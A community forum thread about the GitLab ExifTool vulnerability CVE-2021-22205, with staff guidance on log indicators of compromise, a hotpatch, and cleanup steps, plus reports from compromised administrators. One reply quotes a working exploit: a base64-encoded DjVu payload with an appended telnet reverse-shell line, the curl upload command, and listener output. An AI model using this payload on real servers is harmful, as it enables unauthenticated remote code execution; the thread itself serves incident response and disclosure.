CVE-2021-22205: How to determine if a self-managed instance has been impacted

Using available logs provided by GitLab, it is possible to determine if a GitLab instance has been compromised through the exploitation of CVE-2021-22205. Note, this issue was remediated and patched in the GitLab 13.10.3, 13.9.6, and 13.8.8 release from April 14, 2021: GitLab Critical Security Release: 13.10.3, 13.9.6, and 13.8.8 | GitLab.

All information provided here should be considered examples of information that could be found in log files. It is not intended to be an exhaustive list of possible log entries. As such, log entries and indicators of compromise (IOC) will vary slightly depending upon deployment configurations and malicious actor exploitation tactics. By default, GitLab instances maintain 30 days of log data. If the activity associated with a compromised instance occurred outside of this retention window, it is unlikely that similar IOC log entries will exist. Additionally, since logs rotate daily the .*.gz files contained in each of the mentioned log directories should also be searched.

Log events indicating a compromise will exist in the GitLab Workhorse current directory /var/log/gitlab/gitlab-workhorse/current which will contain an ExifTool error log entry from the time the vulnerability was exploited. For example:

`{
  "correlation_id": "01FEPNG60XWAQ9K5EE3GB909Q6",
  "filename": "exploit.jpg",
  "level": "info",
  "msg": "running exiftool to remove any metadata",
  "time": "2021-09-03T20:27:16Z"
}
{
  "command": [
    "exiftool",
    "-all=",
    "--IPTC:all",
    "--XMP-iptcExt:all",
    "-tagsFromFile",
    "@",
    "-ResolutionUnit",
    "-XResolution",
    "-YResolution",
    "-YCbCrSubSampling",
    "-YCbCrPositioning",
    "-BitsPerSample",
    "-ImageHeight",
    "-ImageWidth",
    "-ImageSize",
    "-Copyright",
    "-CopyrightNotice",
    "-Orientation",
    "-"
  ],
  "correlation_id": "01FEPNG60XWAQ9K5EE3GB909Q6",
  "error": "exit status 1",
  "level": "info",
  "msg": "exiftool command failed",
  "stderr": "Error: Writing of this type of file is not supported - -\n",
  "time": "2021-09-03T20:27:17Z"
}

Another example from gitlab-workhorse logs following exploit of this vulnerability is:

{"command":["exiftool","-all=","--IPTC:all","--XMP-iptcExt:all","-tagsFromFile","@","-ResolutionUnit","-XResolution","-YResolution","-YCbCrSubSampling","-YCbCrPositioning","-BitsPerSample","-ImageHeight","-ImageWidth","-ImageSize","-Copyright","-CopyrightNotice","-Orientation","-"],"correlation_id":"01FKBH8HB3A5YR8S7PYYB5A8SN","error":"signal: killed","level":"info","msg":"exiftool command failed","stderr":"sh: 1: Trying: not found\nsh: 2: Connected: not found\nsh: 3: Escape: not found\nConnection closed by foreign host.\n","time":"2021-10-31T11:07:18-07:00"}
{"correlation_id":"01FKBH8HB3A5YR8S7PYYB5A8SN","error":"error while removing EXIF","level":"error","method":"POST","msg":"","time":"2021-10-31T11:07:18-07:00","uri":"/e7c6305189bc5bd5"}
{"content_type":"text/html; charset=utf-8","correlation_id":"01FKBH8HB3A5YR8S7PYYB5A8SN","duration_ms":7636442,"host":"10.0.0.7","level":"info","method":"POST","msg":"access","proto":"HTTP/1.1","referrer":"","remote_addr":"127.0.0.1:0","remote_ip":"127.0.0.1","route":"","status":422,"system":"http","time":"2021-10-31T11:07:18-07:00","ttfb_ms":7636436,"uri":"/e7c6305189bc5bd5","user_agent":"curl/7.47.0","written_bytes":2936}

The exiftool command failed and "error":"error while removing EXIF" in gitlab-workhorse` logs may be indicators of (attempted) exploitation of CVE-2021-22201.

Correlating the timestamps from the workhorse logs with the NGINX Access Logs in /var/log/gitlab/nginx/gitlab_access_log can be used to identify the IP address of the attacker. However, it should be understood that depending on the network architecture and instance deployment configuration, the identified IP address may not be that of that malicious actor.

192.168.1.50 - - [03/Sep/2021:06:27:08 +0000] "GET /users/sign_in HTTP/1.1" 200 3193 "" "python-requests/2.25.1" 2.46
192.168.1.50 - - [03/Sep/2021:06:27:08 +0000] "POST /users/sign_in HTTP/1.1" 200 3371 "" "python-requests/2.25.1" 2.46
192.168.1.50 - - [03/Sep/2021:06:27:09 +0000] "GET /api/v4/projects?per_page=1000 HTTP/1.1" 200 2 "" "python-requests/2.25.1" -
192.168.1.50 - - [03/Sep/2021:06:27:09 +0000] "GET /help HTTP/1.1" 302 120 "" "python-requests/2.25.1" -
192.168.1.50 - - [03/Sep/2021:06:27:10 +0000] "GET /users/sign_in HTTP/1.1" 200 3379 "" "python-requests/2.25.1" 2.46

In many exploitation cases investigated, the malicious actor created a new account on the instance. Attempts to login and access the instance through the API can be found and correlated in the production_json.log located at /var/log/gitlab/gitlab-rails/production_json.log using the IP address identified previously.

{
  "method": "POST",
  "path": "/users/sign_in",
  "format": "*/*",
  "controller": "SessionsController",
  "action": "new",
  "status": 200,
  "time": "2021-09-03T06:27:08.960Z",
  "params": [
    {
      "key": "utf8",
      "value": "%E2%9C%93"
    },
    {
      "key": "authenticity_token",
      "value": "[FILTERED]"
    },
    {
      "key": "user",
      "value"{
        "login": "dexbcxh",
        "password": "[FILTERED]",
        "remember_me": "0"
      }
    }
  ],
  "remote_ip": "192.168.1.50",
  "user_id": null,
  "username": null,
  "ua":"python-requests/2.25.1
}

Available in GitLab v12.3 and later, the auth.log located at /var/log/gitlab/gitlab-rails/auth.log can also be used to also identify attempted and successful user logins. While not an all inclusive list, some of the most common email addresses and usernames used by malicious actors are as follows:

User emails:

Usernames:

  • dexbcx
  • dexbcx818
  • dexbcxh
  • dexbcxi
  • dexbcxa99

Additional information and details regarding logging with GitLab can be found online in our GitLab Docs; subsection Log system.

3 Likes

Any user running a vulnerable version of GitLab should upgrade to a patched version as soon as possible, preferably the latest version of GitLab.

If upgrading immediately is not an option:

Mitigations & Workarounds

Hotpatch

Anyone running a vulnerable, public-facing GitLab self-managed instance unable to immediately upgrade to a patched version can apply a patch as a temporary hotfix. Applying this patch will change the relevant code to prevent further exploitation of the vulnerability.

The commands to do on a GitLab Omnibus Linux installation are:

sudo su
cd ~
curl -JLO https://gitlab.com/gitlab-org/build/CNG/-/raw/master/gitlab-ruby/patches/allow-only-tiff-jpeg-exif-strip.patch
cd /opt/gitlab/embedded/lib/exiftool-perl
patch -p2 < ~/allow-only-tiff-jpeg-exif-strip.patch

If youā€™re running a vulnerable version, canā€™t upgrade immediately, and you canā€™t apply the hotpatch for whatever reason, you can:

Replace exiftool script with cat -

This workaround will prevent all stripping of exif data from uploaded images.

Replace /opt/gitlab/embedded/bin/exiftool with a file containing this content:

#!/bin/bash

cat -

If needed, chmod a+x exiftool to ensure itā€™s executable.

Important

These workarounds are applicable only on Rails / Workhorse nodes (anything with HTTP GitLab components exposed).

To remain patched against exploitation of this vulnerability while running vulnerable versions of GitLab SM accessible via the public internet:

  • You MUST perform the workaround every time GitLab is updated or reinstalled, until reaching version 13.10.3+ (for Linux package or source installation)
  • You must perform the workaround every time you update or deploy a fresh container. (for Docker / Kubernetes deployments)
3 Likes

We know for certain our instance was compromised by this vulnerability. We patched it immediately as we found out from our cloud provider warning us of large amount of bytes being sent out. We have also deleted the admin accounts the attacker has created. We also know it is this exiftool attack based on looking at our logs. After our patch the bots continued uploading jpg files and we can see the exiftool now rejecting it in the logs. So its fairly certain this is the same attacker as described in this vulnerability.

Since this vulnerability allowed the attacker to create admin level users and API access, has anyone else seen any other behavior beyond the DDOS? We are currently reading through the images uploaded and checking what was the RCE they ran but wanted to post this in case anyone else has found any other side effects.

Thank you

Hi!

We have an instance that was compromised and also received messages from our hosting provider that malicious traffic had been detected.

The Gitlab instance has been updated to the latest version but this afternoon, malicious traffic was detected again. I can see in workhorse logs that the upload was rejected, but I could find in temp files a malicious binary (under ā€œ/tmp/putinā€) that seemed to be responsible for spawning processes that I suspect were the source of the huge outbount traffic that triggered the hosting providerā€™ alert.

Is there anything we need to clean up after the upgade for the security breach to be closed properly? I also removed an account that was created in Gitlab which was on the list of suspect usernames found on this thread.

Any help would be greatly appreciated! Thanks!

Thank you for the hot fix, I can not work out the upgrade slowly. However, when I tried to follow the upgrade path, I figured out that the following file is missing in the repository: gitlab-ce-13.8.8-ce.0.sles15.x86_64.rpm, while the only one for aarch64 is present, anybody got this file?

Hello, I am experiencing the same issue, did you resolve it in any way? I upgraded to v14

Hi!

I donā€™t know if I got all the offending pieces of malware, but my method was to comb through Gitlab Workhorse logs related to exiftool and track all the malicious scripts that were executed by the image upload method (the cURL calls could be clearly seen in the logs). I found mainly two of them hiding in temporary folders (/tmp and /var/tmp in my case) and downloaded them on an insolated VM to look at their contents. They were downloading software and masquerading it with alternate names. What killed it too was that they added crontab configurations to self-download at regular intervals so that even if you deleted the files, theyā€™d come back. One of the crontabs was named ā€œbkp-cronā€ making it look like something legit. I deleted all the crons and files and I believe I removed the traces of the different attacks.

Good luck for your cleanup!

It would be much appreciated if you can guide more in details through this or show me how to stop the cripts/ atleast the ones you found?

Since they can do rce, then they probably can do privilege escalation as well as it is easier to get the inital foothold. Set up firewall or put it under something like VPN will be safer.

(I wrote this when @ralfaroā€™s post first appeared, but for some reason I didnā€™t send it) I think itā€™s good that GitLab published information like this. Iā€™m less impressed that it happens so long after patched versions came out. The vulnerability was not present in 13.11 that came out in April

A malicious actor exploiting CVE-2021-22205 may leave scripts or crontab entries that persist even after the GitLab instance was patched or upgraded.

If youā€™re running a patched or updated GitLab version and thereā€™s evidence your system is still compromised, consider backing up your GitLab data and restoring it on a fresh server.

2 Likes

In my case, I patched to the 14.4 yesterday and Workhorse is still printing activities. No system root crontab was accessible to them, but they tried. And hereā€™s the thing, I think they somehow programmed jobs like a legit project but Gitlabā€™s interface doesnā€™t detect them, just Workhorse.

Here is the latest exiftool print:

{"correlation_id":"01FM1SSKGHKV156MYXGANN64W1","filename":"l.jpg","imageType":1,"level":"info","msg":"invalid content type, not running exiftool","time":"2021-11-09T07:32:27Z"}
{"client_mode":"local","copied_bytes":767,"correlation_id":"01FM1SSKGHKV156MYXGANN64W1","is_local":true,"is_multipart":false,"is_remote":false,"level":"info","local_temp_path":"/opt/gitlab/embedded/service/gitlab-rails/public/uploads/tmp","msg":"saved file","remote_id":"","temp_file_prefix":"l.jpg","time":"2021-11-09T07:32:27Z"}
{"content_type":"text/html; charset=utf-8","correlation_id":"01FM1SSKGHKV156MYXGANN64W1","duration_ms":43,"host":"[MY IP ADDRESS],"level":"info","method":"POST","msg":"access","proto":"HTTP/1.1","referrer":"","remote_addr":"[TARGET IP ADDRESS]","remote_ip":"[TARGET IP ADDRESS]","route":"","status":404,"system":"http","time":"2021-11-09T07:32:27Z","ttfb_ms":40,"uri":"/9y38mzr4pcus5x62","user_agent":"python-requests/2.26.0","written_bytes":3108}

As you can see, the jpg files were located at /opt/gitlab/embedded/service/gitlab-rails/public/uploads/tmp. Now that I deleted it, the POST attempts throw 204 messages, but the script is still running. Any tips for me?

1 Like

I just patched our system because it was also compromised. I see a few admin users were created which I will delete. But I also see some access tokens that look to be recently added under the root login. See attached screenshot. I was going to remove them, but I want to be sure itā€™s not supposed to be there?

Thanks!
-Chris

1 Like

Hello,

Iā€™m currently facing a similar problem, anyone knows if this vulnerability is fixed on GitLab CE14.4.0-ce.0 ?

Thank you.

Somehow, I feel that GitLab should have been more alerting with this and gathered information on how to clean the instance that was exploited.

I got three users added 1/11 as admin and also 3 api tokens created under my admin account that I revoked.

Ive been running gitlab in a docker instance, how does it work with uploaded files, are they deleted when i shutdown and upgrade to the latest version or do I need to manually remove some uploaded images now?

Also, another thing I dont quite get with this exploit, how is it possible that someone who doesnt have a account on my gitlab instance which is closed for signups can upload image files without being logged in?

1 Like

Could you let me know the logs lications

I found this helpful in this circumstance.

See below and or got to source here: Attackerkb source

Attack Path & Exploit

The confusion around the privilege required to exploit this vulnerability is odd. Unauthenticated and remote users have been and still are able to reach execution of ExifTool via GitLab by design . Specifically HandleFileUploads in uploads.go is called from a couple of PreAuthorizeHandler contexts allowing the HandleFileUploads logic, which calls down to rewrite.go and exif.go , to execute before authentication.

The fall-out of this design decision is interesting in that an attacker needs none of the following:

  • Authentication

  • A CSRF token

  • A valid HTTP endpoint

As such, the following curl command is sufficient to reach, and exploit, ExifTool:

curl -v -F ā€˜file=@echo_vakzz.jpgā€™ http://10.0.0.8/$(openssl rand -hex 8)

In the example above, I reference echo_vakzz.jpg which is the original exploit provided by @wcbowling in their HackerOne disclosure to GitLab. The file is a DjVu image that tricks ExifTool into calling eval on user provided text embedded in the image. Technically speaking, this is an entirely separate issue in ExifTool. @wcbowling provides an excellent explanation here.

But for the purpose of GitLab exploitation, now that we know how easy it is to reach ExifTool, itā€™s only important to know how to generate a payload. A very simple method was posted on the OSS-Security mailing list by Jakub Wilk back in May, but it is character-limiting. So here is a reverse shell that reaches out to 10.0.0.3:1270, made by building off of @wcbowlingā€™s original exploit.

albinolobster@ubuntu:~$ echo -e ā€œQVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=ā€ | base64 -d > lol.jpg albinolobster@ubuntu:~$ echo -n ā€˜TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TFā€™ >> lol.jpg albinolobster@ubuntu:~$ echo -n ā€œfSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==ā€ | base64 -d >> lol.jpg

We can substitute the generated lol.jpg into the curl command like so:

albinolobster@ubuntu:~/Downloads$ curl -v -F ā€˜file=@lol.jpgā€™ http://10.0.0.7/$(openssl rand -hex 8) * Trying 10.0.0.7ā€¦ * Connected to 10.0.0.7 (10.0.0.7) port 80 (#0) > POST /e7c6305189bc5bd5 HTTP/1.1 > Host: 10.0.0.7 > User-Agent: curl/7.47.0 > Accept: / > Content-Length: 912 > Expect: 100-continue > Content-Type: multipart/form-data; boundary=------------------------ae83551d0544c303 > < HTTP/1.1 100 Continue

The resulting reverse shell looks like the following:

albinolobster@ubuntu:~$ nc -lnvp 1270 Listening on [0.0.0.0] (family 0, port 1270) Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport 34836) whoami git id uid=998(git) gid=998(git) groups=998(git)

1 Like

Ah, thanks. I have tested that 13.0.14 was affected by this but version 13.12.8 has amended this. Itā€™s a bit scary as ExifTool was used everywhere. I hope Gitlab team has filled all the holes.

If this RCE vulnerability was exploited on your instance, itā€™s possible that abuse or malicious user access to the system may persist even after upgrading or patching GitLab.

Unfortunately, there is no one-size-fits-all solution or comprehensive checklist one can use to completely secure a server that has been compromised. GitLab recommends following your organizationā€™s established incident response plan whenever possible.

The suggestions below may help mitigate the threat of further abuse or a malicious actor having persistent access, but this list is not comprehensive or exhaustive.

GitLab-specific:

  • Audit user accounts, delete suspicious accounts created in the past several months
  • Review the GitLab logs and server logs for suspicious activity, such as activities taken by any user accounts detected in the user audit.
  • Rotate admin / privileged API tokens
  • Rotate sensitive credentials/variables/tokens/secrets (located in instance configuration, database, CI pipelines, or elsewhere)
  • Check for suspicious files (particularly those owned by git user and/or located in tmp directories)
  • Migrate GitLab data to a new server
  • Check for crontab / cronjob entries added by the git user
  • Upgrade to the latest version and adopt a plan to upgrade after every security patch release
  • Review project source code for suspicious modifications
  • Check for newly added or modified GitLab Runners
  • Check for suspicious webhooks or git hooks

Additionally, the suggestions below are common steps taken in incident response plans when servers are compromised by malicious actors.

  • Look for unrecognized background processes
  • Review network logs for uncommon traffic
  • Check for open ports on the system
  • Establish network monitoring and network-level controls
  • Restrict access to the instance at the network level (restrict access to authorized users/machines only)
  • Decommission servers that were compromised
  • Migrate data on the compromised server to a new server with all the latest security patches
2 Likes

This is an important check to do, it looks like weā€™ve see evidence of this vector in active use. Itā€™d be a way to re-establish control of the system.

Check in every repo for custom hooks in /var/opt/gitlab/git-data/repositories/@hashed/*/*/*.git/custom_hooks/* (and / or the relevant path for Git repos still using legacy storage)

Check also for any added server hooks.

To find out where these are put on from-source and Omnibus installs, and also where repository hooks are stored (by default) on a from-source install, check out the custom hooks docs.

3 Likes